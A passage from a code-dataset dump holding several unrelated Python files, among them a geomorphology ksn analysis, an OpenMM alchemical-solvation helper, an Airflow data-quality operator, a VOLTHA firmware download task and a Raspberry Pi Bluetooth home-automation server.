5\n reject_fraction = 0.1\n \n prefixes = ['af', 'as', 'au', 'ca', 'eu', 'na', 'sa']\n lats = list()\n lons = list()\n areas = list()\n for sample_name, lat, lon, dr, dr_sig, a in data:\n lats.append(float(lat))\n lons.append(float(lon))\n areas.append(float(a)*1.0E6)\n \n locations = zip(lons,lats)\n ksn_vec = np.zeros(len(areas), dtype = np.float64)\n a_calc_vec = np.zeros(len(areas), dtype = np.float64)\n \n for prefix in prefixes:\n print('Loading prefix: ' + prefix)\n area = d.GeographicArea.load(prefix + '_area')\n #ksi = d.GeographicKsi.load(prefix + '_ksi_' + suffix)\n #relief = d.ScaledRelief.load(prefix + '_relief_' + suffix)\n d8 = d.FlowDirectionD8.load(prefix + '_flow_direction')\n elevation = d.Elevation.load(prefix + '_elevation')\n print('Done loading prefix: ' + prefix)\n counter = 0\n xo = np.mean(d8._mean_pixel_dimension(flow_direction = d8) * d8.pixel_scale())\n locs = tuple()\n areas_for_valid_points = tuple()\n for (lon, lat), area_m in zip(locations, areas):\n if elevation.location_in_grid((lon, lat)) and area_m > 5.0*Ao:\n locs = locs + ((counter, (lon, lat)),)\n areas_for_valid_points = areas_for_valid_points + (area_m, )\n counter = counter + 1\n counter = tuple([el[0] for el in locs]);\n locat = tuple([el[1] for el in locs]);\n locations_snap = area.snap_locations_to_closest_value(locat, areas_for_valid_points, pixel_radius = pixel_radius)\n locations_snap_indexes = area._xy_to_rowscols(locations_snap)\n dem_derived_areas = [area[i,j] for (i,j) in locations_snap_indexes]\n for (lon, lat), target_area, measured_area in zip(locat, areas_for_valid_points, dem_derived_areas):\n print('Longitude: ' + str(lon) + '; Latitude: ' + str(lat) + '; target area: ' + str(target_area) + '; measured area: ' + str(measured_area) + '; fractional difference: ' + str(np.abs(measured_area - target_area)/target_area))\n\n fraction_difference = [np.abs(derived_area - measured_area) / measured_area for (derived_area, measured_area) in zip(dem_derived_areas, areas_for_valid_points)]\n chi = d.GeographicChi(area = area, flow_direction = d8, theta = theta, Ao = Ao, outlets = (locations_snap[0],))\n scaled_relief = d.ChiScaledRelief(elevation = elevation, flow_direction = d8, theta = theta, Ao = Ao, outlets = (locations_snap[0],)) \n first_element = True\n \n print('Ao=')\n print(Ao)\n \n for (lon, lat), areas_m, counter_v, areas_dem, sample_fraction_difference in zip(locations_snap, areas_for_valid_points, counter, dem_derived_areas, fraction_difference):\n if first_element:\n first_element = False\n else:\n chi._create_from_inputs(area = area, flow_direction = d8, theta = theta, Ao = Ao, outlets = ((lon, lat),))\n scaled_relief._create_from_inputs(elevation = elevation, flow_direction = d8, theta = theta, Ao = Ao, outlets = ((lon, lat),)) \n chi_vec, scaled_relief_vec, a_calc = find_ksi_scaled_relief(lat, lon, area, chi, scaled_relief, d8, area_m, pixel_radius)\n plt.plot(chi_vec, scaled_relief_vec, 'k.')\n plt.show()\n \n if chi_vec is not None and sample_fraction_difference < reject_fraction:\n best_fit, residuals, rank, s = best_chi_ksn(chi_vec, scaled_relief_vec)\n best_ks = best_fit[0]\n ksn_vec[counter_v] = best_ks\n a_calc_vec[counter_v] = a_calc\n print('lat = {0}, long = {1}, ksn = {2}, np = {3}, reported area = {4}, measured area = {5}, np/4 = {6}'.format(lat,lon,best_ks, len(chi_vec), areas_m/1.0E6, areas_dem/1.0E6, len(chi_vec)/4))\n \n area = None\n d8 = None\n elevation = None\n \n return ksn_vec, a_calc_vec\n\n\ndef extract_all_ksi_relief_values_for_position(position, d8, 
area, ksi, relief, Ao, mask=None, A_cutoff = None):\n (row, col) = area._xy_to_rowscols((position, ))[0]\n \n indexes_of_area = d8.get_indexes_of_upstream_cells(row, col)\n ksi_values = list()\n relief_values = list()\n if A_cutoff is None:\n A_cutoff = Ao\n for (row, col) in indexes_of_area:\n if ksi[row,col] is None or relief[row,col] is None or np.isnan(ksi[row, col]) or np.isnan(relief[row,col]):\n return None, None, None\n if area[row, col] >= A_cutoff:\n if mask is None:\n ksi_values.append(ksi[row,col])\n relief_values.append(relief[row,col])\n elif mask[row, col] == 1:\n ksi_values.append(ksi[row,col])\n relief_values.append(relief[row,col])\n return ksi_values, relief_values\n\ndef create_chi_grid_for_geographic_prefix(prefix, thetas, Ao, basin_lengths):\n \n area = d.GeographicArea.load(prefix + \"_area\")\n d8 = d.FlowDirectionD8.load(prefix + \"_flow_direction\")\n flow_length = d.GeographicFlowLength.load(prefix + \"_flow_length\")\n elevation = d.Elevation.load(prefix + \"_elevation\")\n for theta in thetas:\n for basin_length in basin_lengths:\n chi = d.GeographicChi(area = area, flow_direction=d8, flow_length=flow_length, theta=theta, Ao=Ao, basin_length=basin_length)\n chi.save(prefix + '_chi_' + str(basin_length) + '_' + str(theta).replace('.', '_') + '_' + str(Ao))\n chi = None\n relief = d.ChiScaledRelief(elevation = elevation, area = area, flow_direction=d8, flow_length=flow_length, theta=theta, Ao=Ao, basin_length=basin_length)\n relief.save(prefix + '_relief_' + str(basin_length) + '_' + str(theta).replace('.', '_') + '_' + str(Ao))\n relief = None\n \ndef calculate_ks_for_sample(v, d8, ksi, relief, area, Ao = 250000, mask = None, xo = None, A_cutoff = None):\n \n ks = list()\n if xo is None:\n xo = np.mean(d8._mean_pixel_dimension(flow_direction = d8) * d8.pixel_scale())\n for position in v:\n ksi_values, relief_values = extract_all_ksi_relief_values_for_position(position, d8, area, ksi, relief, Ao, mask, A_cutoff=A_cutoff)\n from matplotlib import pyplot as plt\n try:\n best_fit, residuals, rank, s = best_chi_ksn(ksi_values, relief_values, xo)\n best_ks = best_fit[0] \n model_residuals = residuals[0] \n relief_array = np.array(relief_values)\n relief_mean = np.mean(relief_array)\n total_residuals = np.sum((relief_array - relief_mean)**2)\n R2 = 1 - model_residuals / total_residuals \n except:\n best_ks = 0\n R2 = 0 \n ks.append((best_ks, R2))\n\n return ks\n\ndef plot_relief_and_ksi(v, d8, ksi, relief, area, Ao = 250000, mask = None):\n from matplotlib import pyplot as plt\n for position in v:\n ksi_values, relief_values = extract_all_ksi_relief_values_for_position(position, d8, area, ksi, relief, Ao, mask = mask)\n plt.figure()\n plt.plot(ksi_values, relief_values, 'k.', rasterized = True)\n\n\ndef calculate_slope_fraction_for_sample(v, d8, area, slope, cutoff = 0.2):\n \n fraction = list()\n \n for position in v:\n \n (row, col) = area._xy_to_rowscols((position, ))[0]\n \n indexes_of_area = d8.get_indexes_of_upstream_cells(row, col)\n total_number_of_points_in_basin = len(indexes_of_area)\n number_of_points_in_basin_above_cutoff = 0\n for (row, col) in indexes_of_area:\n print(slope[row,col])\n if slope[row,col] > cutoff:\n number_of_points_in_basin_above_cutoff += 1\n \n fraction.append(number_of_points_in_basin_above_cutoff / total_number_of_points_in_basin)\n\n return fraction\n\ndef plot_stock_and_montgomery():\n \n K = {'granitoids': (4.4e-7, 4.3e-6),\n 'volcaniclastics': (4.8e-5, 3.0e-4),\n 'mudstones': (4.7e-4, 7.0e-3),\n 'basalt': (3.8e-6, 7.3e-6)}\n \n 
colors = {'granitoids': 'r-',\n 'volcaniclastics': 'b-',\n 'mudstones': 'g-',\n 'basalt': 'm-'}\n \n from matplotlib import pyplot as plt\n \n for key in K.keys():\n \n U = (1e-4, 1e1)\n ks = (U[0] / 1000.0 / K[key][0], U[1] / 1000.0 / K[key][0])\n plt.plot(U,ks,colors[key])\n ks = (U[0] / 1000.0 / K[key][1], U[1] / 1000.0 / K[key][1])\n plt.plot(U,ks,colors[key])\n\n \n\n \n","sub_path":"GradientSamples/bin/denudationRateAnalysis.py","file_name":"denudationRateAnalysis.py","file_ext":"py","file_size_in_byte":12227,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"33241103","text":"__author__ = 'jianzhong'\nimport youthSetting as YSetting\nimport FileUtils as Util\nimport RegexUtil as regexUtil\nimport sys\nimport re\nimport os\n\n#main method enter\n\n\n#all replace action was execute at here\ndef replaceAllString():\n Util.replaceOstrWithNstr(YSetting.DNS,YSetting.YOUTHDNS)\n Util.replaceOstrWithNstr(YSetting.ctripBaoLeiIP,YSetting.youthBaoLeiIP)\n Util.replaceOstrWithNstr(YSetting.ctripPaymentIP,YSetting.youthPaymentIP)\n Util.replaceOstrWithNstr(\"ctrip://\",\"ctripyouth://\")\n regexUtil.replaceFileStrWithRegex('(\\s)*__dataSource.systemCode_\\s=\\s@\"[0-9]*;','__dataSource.systemCode_ = @\"12\";','AppDelegate.m')\n regexUtil.replaceFileStrWithRegex('(\\s)*#define kUBTAppID @\"481001\"','#define kUBTAppID @\"481001\"\\n#define kCrittercismAppId @\"538738311acb715292000001\"','config.h')\n regexUtil.replaceFileStrWithRegex('(\\s)*\\[self\\s*initDataSource\\];','[self initDataSource];\\n[Crittercism enableWithAppID:kCrittercismAppId];','AppDelegate.m')#63\n regexUtil.replaceFileStrWithRegex('(\\s)*\\[self\\s*reloadRootViewControllers\\];','[self reloadRootViewControllers];\\n[[CTLocationManager sharedLocationManager] startLocatingWithDelegate:nil timeout:60 disableCache:YES needCtripCity:YES];','')#64\n regexUtil.replaceFileStrWithRegex('NSString\\*\\s*scheme\\s*=\\s*\\[\\[url scheme\\] lowercaseString\\];','NSString* scheme = [[url scheme] lowercaseString];\\nif([@\"ctripyouth\" isEqualToString:scheme]){\\nscheme = @\"ctrip\";\\n}','AppDelegate.m')#66\n regexUtil.replaceFileStrWithRegex('NSString\\s\\*urlStr\\s=\\s*url\\.absoluteString;','NSString *urlStr = url.absoluteString;\\nurlStr = [urlStr stringByReplacingOccurrencesOfString:@\"ctrip://\" withString:@\"ctripyouth://\"];\\n','CTDestinationURLDispatcher.m')\n regexUtil.replaceFileStrWithRegex('if\\s\\(\\[\\[URL\\.scheme\\s*lowercaseString\\]\\s*isEqualToString\\:kCtripWirelessUrlSchemeString\\]\\)','if ([[URL.scheme lowercaseString] isEqualToString:kCtripWirelessUrlSchemeString] || [[URL.scheme lowercaseString] isEqualToString:@\"ctrip\"])','CTURLDispatcher.m')\n regexUtil.replaceFileStrWithRegex('','','')\n\n#1,replace\n#2,re compile methods\n#3,move methods\n\ndef mainMethod():\n replaceAllString()\n\n\nmainMethod()","sub_path":"python/MergeCode/MergeCodeTool.py","file_name":"MergeCodeTool.py","file_ext":"py","file_size_in_byte":2177,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"495394208","text":"#\n# Copyright 2017 the original author or authors.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n#\nfrom task import Task\nfrom twisted.internet.defer import inlineCallbacks, TimeoutError, failure, AlreadyCalledError\nfrom twisted.internet import reactor\nfrom voltha.extensions.omci.omci_defs import ReasonCodes\nimport requests\nimport os\n\n\nclass FileDownloadTask(Task):\n name = \"Image File Download Task\"\n\n def __init__(self, omci_agent, device_id, url, local_path):\n super(FileDownloadTask, self).__init__(FileDownloadTask.name, omci_agent, device_id,\n exclusive=False,\n watchdog_timeout=45)\n self.url = url\n self.local_path = local_path\n # self.log.debug('{} running'.format(FileDownloadTask.name))\n\n def start(self):\n self.log.debug('{} running'.format(FileDownloadTask.name))\n # reactor.callLater(1, self.deferred.callback, 'device {} success downloaded {} '.format(self.device_id, self.url))\n try:\n # local_filename = url.split('/')[-1]\n dir_name = os.path.dirname(self.local_path)\n if not os.path.exists(dir_name):\n os.makedirs(dir_name)\n\n self.strobe_watchdog()\n r = requests.get(self.url, stream=True)\n\n with open(self.local_path, 'wb') as f:\n for chunk in r.iter_content(chunk_size=1024):\n self.strobe_watchdog()\n if chunk: # filter out keep-alive new chunks\n f.write(chunk)\n self.deferred.callback('device {} success downloaded {} '.format(self.device_id, self.url))\n except Exception as e:\n #self.deferred.errback(KeyError('device {} failed downloaded {} '.format(self.device_id, self.url)))\n self.deferred.errback(failure.Failure(e))\n \n def stop(self):\n self.cancel_deferred()\n super(FileDownloadTask, self).stop()\n\n","sub_path":"src/voltha/voltha/extensions/omci/tasks/file_download_task.py","file_name":"file_download_task.py","file_ext":"py","file_size_in_byte":2501,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"114816494","text":"\"\"\"\n\nCreated by: Nathan Starkweather\nCreated on: 02/26/2014\nCreated in: PyCharm Community Edition\n\n\n\"\"\"\n__author__ = 'Nathan Starkweather'\n\nfrom pbslib.recipemaker.tpid_recipes import *\n\nif __name__ == '__main__':\n pgains = [30 + i / 10 for i in range(0, 200, 25)]\n print(pgains)\n\n itimes = (3, 3.5, 4, 4.5, 5, 6, 7)\n\n settings = []\n for p in pgains:\n for i in itimes:\n settings.append((p, i, 0))\n\n print(len(settings))\n\n settings = [(40, i, 0) for i in (5.5, 6, 6.5, 7)]\n\n r = many_with_pumps(settings)\n f = save_recipe(r)\n from os import startfile\n startfile(f)\n","sub_path":"archive/tpid/make_tpid_recipe.py","file_name":"make_tpid_recipe.py","file_ext":"py","file_size_in_byte":615,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"259636077","text":"################################################################\n# Kevin Shen, 2019 #\n# kevinshen@ucsb.edu #\n# #\n################################################################\n## Helper functions to alchemize (small, < rcut) molecules in openMM\n# Currently implemented for handling standard OMM forcefields (i.e. the standard nonbonded force; support for custom nonbonded force to come later)#\n# Strategy is as delineated here: https://github.com/choderalab/openmmtools/issues/376\n# 1) Turn of charges in standard NonbondedForce\n# 2) Add new softCoreForce to turn off LJ interaction with other particles\n# 3) Add new soluteCoulForce to turn on intramolecular electrostatics\n# 4) Add new soluteLJForce to turn on intramolecular LJ interactions\n# \n# Example Usage:\n#import alchemify\n#soluteIndices = []\n# soluteResidues = [soluteRes] #list of residues to alchemify\n# #parmed gromacs topology\n# for ir,res in enumerate(top.residues):\n# if ir in soluteResidues:\n# for atom in res.atoms:\n# soluteIndices.append(atom.idx)\n# print(\"Solute residue: {}\".format([top.residues[ir].atoms for ir in soluteResidues]))\n# print(\"Solute Indices: {}\".format(soluteIndices))\n# alch = alchemify.alchemist(system,lambdaLJ,lambdaQ)\n# alch.setupSolute(soluteIndices)\n\nimport simtk.openmm as mm\nimport simtk.openmm.app as app\nimport simtk.unit as u\nimport numpy as np\n\nclass alchemist:\n \"\"\"A helper class to manage an alchemical simulation\n Notes\n -----\n Basic usage is:\n alch = alchemist()\n alch.setupSolute(soluteIndices)\n\n\n \"\"\"\n def __init__(self,system,lambdaLJ=1.0, lambdaQ=1.0):\n \"\"\"Initialization\n Parameters\n ----------\n system : openmm system\n\n Notes\n -----\n Todo:\n 1) add type-checking\n \"\"\"\n\n self.system = system\n self.q0s = [[0]]*self.system.getNumParticles()\n self.setupFF(lambdaLJ,lambdaQ)\n self.soluteInitialized = False\n\n def setupFF(self, lambdaLJ=1.0, lambdaQ=1.0):\n \"\"\"Setup the Alchemical force fields, and store charge vector\"\"\"\n #We need to add a custom non-bonded force for the solute being alchemically changed\n #Will be helpful to have handle on non-bonded force handling LJ and coulombic interactions\n #Currently assumes only one Nonbonded force setup in the system\n NBForce = None\n for frc in self.system.getForces():\n if (isinstance(frc, mm.NonbondedForce)):\n NBForce = frc\n self.lambdaLJ = lambdaLJ\n self.lambdaQ = lambdaQ\n print(\"...alchemify: Using lambdaLJ: {}, lambdaQ: {}\".format(self.lambdaLJ,self.lambdaQ))\n \n #Define the soft-core function for turning on/off LJ interactions\n #In energy expressions for CustomNonbondedForce, r is a special variable and refers to the distance between particles\n #All other variables must be defined somewhere in the function.\n #The exception are variables like sigma1 and sigma2.\n #It is understood that a parameter will be added called 'sigma' and that the '1' and '2' are to specify the combining rule.\n softCoreFunction = '4.0*lambdaLJ*epsilon*x*(x-1.0); x = (1.0/reff_sterics);'\n softCoreFunction += 'reff_sterics = (0.5*(1.0-lambdaLJ) + ((r/sigma)^6));'\n softCoreFunction += 'sigma=0.5*(sigma1+sigma2); epsilon = sqrt(epsilon1*epsilon2)'\n #Define the system force for this function and its parameters\n SoftCoreForce = mm.CustomNonbondedForce(softCoreFunction)\n SoftCoreForce.addGlobalParameter('lambdaLJ', self.lambdaLJ) #Throughout, should follow convention that lambdaLJ=1.0 is fully-interacting state\n SoftCoreForce.addPerParticleParameter('sigma')\n 
SoftCoreForce.addPerParticleParameter('epsilon')\n\n #Will turn off electrostatics completely in the original non-bonded force\n #In the end-state, only want electrostatics inside the alchemical molecule\n #To do this, just turn ON a custom force as we turn OFF electrostatics in the original force\n ONE_4PI_EPS0 = 138.935456 #in kJ/mol nm/e^2\n soluteCoulFunction = '(1.0-(lambdaQ^2))*ONE_4PI_EPS0*charge/r;'\n soluteCoulFunction += 'ONE_4PI_EPS0 = %.16e;' % (ONE_4PI_EPS0)\n soluteCoulFunction += 'charge = charge1*charge2'\n SoluteCoulForce = mm.CustomNonbondedForce(soluteCoulFunction)\n #Note this lambdaQ will be different than for soft core (it's also named differently, which is CRITICAL)\n #This lambdaQ corresponds to the lambda that scales the charges to zero\n #To turn on this custom force at the same rate, need to multiply by (1.0-lambdaQ**2), which we do\n SoluteCoulForce.addGlobalParameter('lambdaQ', self.lambdaQ) \n SoluteCoulForce.addPerParticleParameter('charge')\n \n #Also create custom force for intramolecular alchemical LJ interactions\n #Could include with electrostatics, but nice to break up\n #We could also do this with a separate NonbondedForce object, but it would be a little more work, actually\n soluteLJFunction = '4.0*epsilon*x*(x-1.0); x = (sigma/r)^6;'\n soluteLJFunction += 'sigma=0.5*(sigma1+sigma2); epsilon=sqrt(epsilon1*epsilon2)'\n SoluteLJForce = mm.CustomNonbondedForce(soluteLJFunction)\n SoluteLJForce.addPerParticleParameter('sigma')\n SoluteLJForce.addPerParticleParameter('epsilon')\n\n #=== Set other interaction parameters ===\n rcut = NBForce.getCutoffDistance() #default in nanometers\n nonbondedMethod = min(NBForce.getNonbondedMethod(),2)\n print(\"...alchemify: Cutoff method: {}\".format(nonbondedMethod))\n print(\"...alchemify: compare to cutoff nonperiodic: {}\".format(mm.CustomNonbondedForce.CutoffPeriodic))\n\n #Set other soft-core parameters as needed\n SoftCoreForce.setCutoffDistance(rcut)\n SoftCoreForce.setNonbondedMethod(nonbondedMethod)\n #SoftCoreForce.setUseSwitchingFunction(True)\n #SoftCoreForce.setSwitchingDistance(9.0*u.angstroms)\n SoftCoreForce.setUseLongRangeCorrection(True) \n\n #Set other parameters as needed - note that for the solute force would like to set no cutoff\n #However, OpenMM won't allow a bunch of potentials with cutoffs then one without...\n #So as long as the solute is smaller than the cut-off, won't have any problems!\n SoluteCoulForce.setCutoffDistance(rcut)\n SoluteCoulForce.setNonbondedMethod(nonbondedMethod)\n #SoluteCoulForce.setUseSwitchingFunction(True)\n #SoluteCoulForce.setSwitchingDistance(9.0*u.angstroms)\n SoluteCoulForce.setUseLongRangeCorrection(False) #DON'T want long-range correction here!\n\n SoluteLJForce.setCutoffDistance(rcut)\n SoluteLJForce.setNonbondedMethod(nonbondedMethod)\n #SoluteLJForce.setUseSwitchingFunction(True)\n #SoluteLJForce.setSwitchingDistance(9.0*u.angstroms)\n SoluteLJForce.setUseLongRangeCorrection(False) \n\n #=== Store the Functions and initial charges ===\n self.SoftCoreForce = SoftCoreForce\n self.SoluteCoulForce = SoluteCoulForce\n self.SoluteLJForce = SoluteLJForce\n self.NBForce = NBForce\n for ind in range(self.system.getNumParticles()):\n #Get current parameters in non-bonded force\n [charge, sigma, epsilon] = NBForce.getParticleParameters(ind)\n self.q0s[ind] = charge\n\n\n def setupSolute(self,soluteIndices):\n \"\"\"Setup force fields and interaction groups to work with designated solute indices\n \n Parameters\n ----------\n soluteIndices : list\n list of atom.idx 
for atom in residue in solute molecule.\n note that getParticleParameters() is 0-indexed, but have to be careful to call atom.index instead of atom.in (1-based indexing, for pdb) \n \"\"\"\n assert not self.soluteInitialized, \"Solute previously initialized, can't add force to system again\"\n\n alchemicalParticles = set(soluteIndices)\n chemicalParticles = set(range(self.system.getNumParticles())) - alchemicalParticles\n \n #Loop over all particles and add to custom forces\n #As we go, will also collect full charges on the solute particles\n #AND we will set up the solute-solute interaction forces\n alchemicalCharges = [[0]]*len(soluteIndices)\n for ind in range(self.system.getNumParticles()):\n #Get current parameters in non-bonded force\n [charge, sigma, epsilon] = self.NBForce.getParticleParameters(ind)\n #Make sure that sigma is not set to zero! Fine for some ways of writing LJ energy, but NOT OK for soft-core!\n if sigma/u.nanometer == 0.0:\n newsigma = 0.3*u.nanometer #This 0.3 is what's used by GROMACS as a default value for sc-sigma\n else:\n newsigma = sigma\n #Add the particle to the soft-core force (do for ALL particles)\n self.SoftCoreForce.addParticle([newsigma, epsilon])\n #Also add the particle to the solute only forces\n self.SoluteCoulForce.addParticle([charge])\n self.SoluteLJForce.addParticle([sigma, epsilon])\n #If the particle is in the alchemical molecule, need to set it's LJ interactions to zero in original force\n if ind in soluteIndices:\n newcharge = self.lambdaQ*self.q0s[ind]\n self.NBForce.setParticleParameters(ind, newcharge, sigma, epsilon*0.0)\n #And keep track of full charge so we can scale it right by lambda\n alchemicalCharges[soluteIndices.index(ind)] = charge\n\n #Now we need to handle exceptions carefully\n for ind in range(self.NBForce.getNumExceptions()):\n [p1, p2, excCharge, excSig, excEps] = self.NBForce.getExceptionParameters(ind)\n #For consistency, must add exclusions where we have exceptions for custom forces\n self.SoftCoreForce.addExclusion(p1, p2)\n self.SoluteCoulForce.addExclusion(p1, p2)\n self.SoluteLJForce.addExclusion(p1, p2)\n\n #Only compute interactions between the alchemical and other particles for the soft-core force\n self.SoftCoreForce.addInteractionGroup(alchemicalParticles, chemicalParticles)\n\n #And only compute alchemical/alchemical interactions for other custom forces\n self.SoluteCoulForce.addInteractionGroup(alchemicalParticles, alchemicalParticles)\n self.SoluteLJForce.addInteractionGroup(alchemicalParticles, alchemicalParticles)\n\n #Now add forces to system. Shouldn't be undone unless we change a system force field in context\n self.system.addForce(self.SoftCoreForce)\n self.system.addForce(self.SoluteCoulForce)\n self.system.addForce(self.SoluteLJForce)\n \n self.chemicalParticles = chemicalParticles\n self.alchemicalParticles = alchemicalParticles\n self.alchemicalCharges = alchemicalCharges\n self.soluteInitialized = True\n\n #def updateState(self,context,lambdaLJ,lambdaQ):\n\n\n","sub_path":"alchemify.py","file_name":"alchemify.py","file_ext":"py","file_size_in_byte":11255,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
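A quick numerical check of the soft-core energy expression set up in setupFF: at lambdaLJ = 1.0, reff_sterics collapses to (r/sigma)^6, so the softened potential must reduce to the plain 4*eps*((sigma/r)^12 - (sigma/r)^6) Lennard-Jones form. The sigma and epsilon values below are arbitrary examples:

import numpy as np

sigma, epsilon = 0.34, 0.65            # nm, kJ/mol (illustrative values)
r = np.linspace(0.3, 1.2, 50)

def softcore(r, lambdaLJ):
    reff_sterics = 0.5 * (1.0 - lambdaLJ) + (r / sigma) ** 6
    x = 1.0 / reff_sterics
    return 4.0 * lambdaLJ * epsilon * x * (x - 1.0)

plain_lj = 4.0 * epsilon * ((sigma / r) ** 12 - (sigma / r) ** 6)
assert np.allclose(softcore(r, 1.0), plain_lj)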
+{"seq_id":"329355061","text":"#instalacao das bibliotecas bluetooths\n#sudo apt install python-pip python-dev ipython\n#sudo apt install bluetooth libbletooth-dev\n#sudo pip install pybluez\nimport bluetooth\n#import de home_controller.py\nfrom home_controller import *\n\nhost = \"\"\nport = 1\nserver = bluetooth.BluetoothSocket(bluetooth.RFCOMM)\n\ntry:\n server.bind((host, port))\nexcept:\n print(\"ERRO\")\n \nserver.listen(1)\nclient, address = server.accept()\n\nprint(\"Conectado a:\", address)\n\nwhile True:\n data = client.recv(1024)\n \n if data is not None:\n print(data)\n \n #corredor\n if data == b'apaga_corredor':\n acende_apaga('corredor', 0, True)\n elif data == b'acende_corredor':\n acende_apaga('corredor', 1, True)\n \n if data == b'fechar_portao':\n acende_apaga('portao', 0, True)\n elif data == b'abrir_portao':\n acende_apaga('portao', 1, True)\n \n #SEGUNDO LED\n if data == b'apaga_banheiro':\n acende_apaga('banheiro_1', 0, True)\n elif data == b'acende_banheiro':\n acende_apaga('banheiro_1', 1, True)\n \n #TERCEIRO LED \n if data == b'apaga_banheiro_2':\n acende_apaga('banheiro_2', 0, True)\n \n elif data == b'acende_banheiro_2':\n acende_apaga('banheiro_2', 1, True)\n \n #QUARTO LED \n if data == b'apaga_quarto':\n acende_apaga('quarto_1', 0, True)\n \n elif data == b'acende_quarto':\n acende_apaga('quarto_1', 1, True)\n \n #SEXTO LED \n if data == b'apaga_cozinha':\n acende_apaga('cozinha', 0, True)\n \n elif data == b'acende_cozinha':\n acende_apaga('cozinha', 1, True)\n \n #SETIMO LED \n if data == b'apaga_quarto_2':\n acende_apaga('quarto_2', 0, True)\n \n elif data == b'acende_quarto_2':\n acende_apaga('quarto_2', 1, True)\n\n #OITAVO LED \n if data == b'apaga_sala':\n acende_apaga('sala', 0, True)\n \n elif data == b'acende_sala':\n acende_apaga('sala', 1, True)","sub_path":"thinkAPI/APIRaspberry/api_bluetooth.py","file_name":"api_bluetooth.py","file_ext":"py","file_size_in_byte":2170,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"605659990","text":"from airflow.contrib.hooks.bigquery_hook import BigQueryHook\nfrom airflow.models import BaseOperator\nfrom airflow.utils.decorators import apply_defaults\n\nclass DataQualityOperator(BaseOperator):\n\n ui_color = '#89DA59'\n\n @apply_defaults\n def __init__(self,\n conn_id=\"\",\n sql_test_cases={},\n *args, **kwargs):\n \"\"\" \n Constructor method where the parameters are initialized.\n params:\n conn_id = represent the identifier of the connector to the database.\n \n sql_test_cases = requesent the queries aimed to check the quality of the data\n and the expected result of the queries.\n \"\"\"\n\n super(DataQualityOperator, self).__init__(*args, **kwargs)\n self.conn_id=conn_id\n self.sql_test_cases=sql_test_cases\n\n\n def execute(self, context):\n \"\"\" \n This method check the quality of the data given the input test cases indicated in the sql_test_cases\n dictionary.\n \"\"\"\n bigquery=BigQueryHook(bigquery_conn_id=self.conn_id)\n found_errors=[]\n for query, expected_result in self.sql_test_cases.items():\n records = bigquery.run_query(sql=query)\n if len(records) < 1 or records[0][0] != expected_result:\n found_errors.append(query)\n \n if len(found_errors) > 0:\n raise ValueError(f\"The following query test cases were not successful {found_errors}\")\n \n self.log.info('DataQualityOperator has been executed')","sub_path":"plugin/operators/data_quality.py","file_name":"data_quality.py","file_ext":"py","file_size_in_byte":1612,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"16609269","text":"# 任一个英文的纯文本文件,统计其中的单词出现的个数。\nimport re\n\ndef counter(file):\n with open(file,'r') as f:\n # text = f.readlines()\n sum = 0\n # f.readlines()返回一个由文本每行字符串为元素组成的列表\n for line in f.readlines():\n sum += len(re.findall(r'\\w+',line))\n return sum\nif __name__ == \"__main__\":\n file = './test.txt'\n print(counter(file))","sub_path":"codes/0004/words-counter.py","file_name":"words-counter.py","file_ext":"py","file_size_in_byte":442,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"312018306","text":"import os\nimport sys\n\nimport pygame.freetype\n\nsys.path.insert(1, os.path.abspath(\".\"))\n\nfrom utils.enum import *\nfrom utils.load import *\nfrom bucketGame.bucketGame import *\nfrom lionGame.lionGame import *\nfrom sheepGame.sheepGame import *\nfrom create_config import *\n\nBLUE = (106, 159, 181)\nWHITE = (255, 255, 255)\n\nWIDTH = 800\nHEIGHT = 800\n\n\nclass UIElement(pygame.sprite.Sprite):\n\n def __init__(self, center_position, text, font_size, bg_rgb, text_rgb, action=None):\n\n self.mouse_over = False\n\n default_image = create_surface_with_text(\n text=text, font_size=font_size, text_rgb=text_rgb, bg_rgb=bg_rgb\n )\n\n highlighted_image = create_surface_with_text(\n text=text, font_size=font_size * 1.2, text_rgb=text_rgb, bg_rgb=bg_rgb\n )\n\n self.images = [default_image, highlighted_image]\n\n self.rects = [\n default_image.get_rect(center=center_position),\n highlighted_image.get_rect(center=center_position),\n ]\n\n self.action = action\n\n super().__init__()\n\n @property\n def image(self):\n return self.images[1] if self.mouse_over else self.images[0]\n\n @property\n def rect(self):\n return self.rects[1] if self.mouse_over else self.rects[0]\n\n def update(self, mouse_pos, mouse_up):\n if self.rect.collidepoint(mouse_pos):\n self.mouse_over = True\n if mouse_up:\n return self.action\n else:\n self.mouse_over = False\n\n def draw(self, surface):\n surface.blit(self.image, self.rect)\n\n\ndef create_surface_with_text(text, font_size, text_rgb, bg_rgb):\n font = pygame.freetype.SysFont(\"Courier\", font_size, bold=True)\n surface, _ = font.render(text=text, fgcolor=text_rgb, bgcolor=bg_rgb)\n return surface.convert_alpha()\n\n\ndef title_screen(screen):\n start_bucket = UIElement(\n center_position=(400, 300),\n font_size=30,\n bg_rgb=BLUE,\n text_rgb=WHITE,\n text=\"Start Bucket Game\",\n action=GameState.BUCKET,\n )\n\n create_bucket = UIElement(\n center_position=(400, 350),\n font_size=15,\n bg_rgb=BLUE,\n text_rgb=WHITE,\n text=\"Create Instance\",\n action=GameState.CREATE,\n )\n\n start_lion = UIElement(\n center_position=(400, 400),\n font_size=30,\n bg_rgb=BLUE,\n text_rgb=WHITE,\n text=\"Start Lion Game\",\n action=GameState.LION,\n )\n\n start_sheep = UIElement(\n center_position=(400, 500),\n font_size=30,\n bg_rgb=BLUE,\n text_rgb=WHITE,\n text=\"Start Sheep 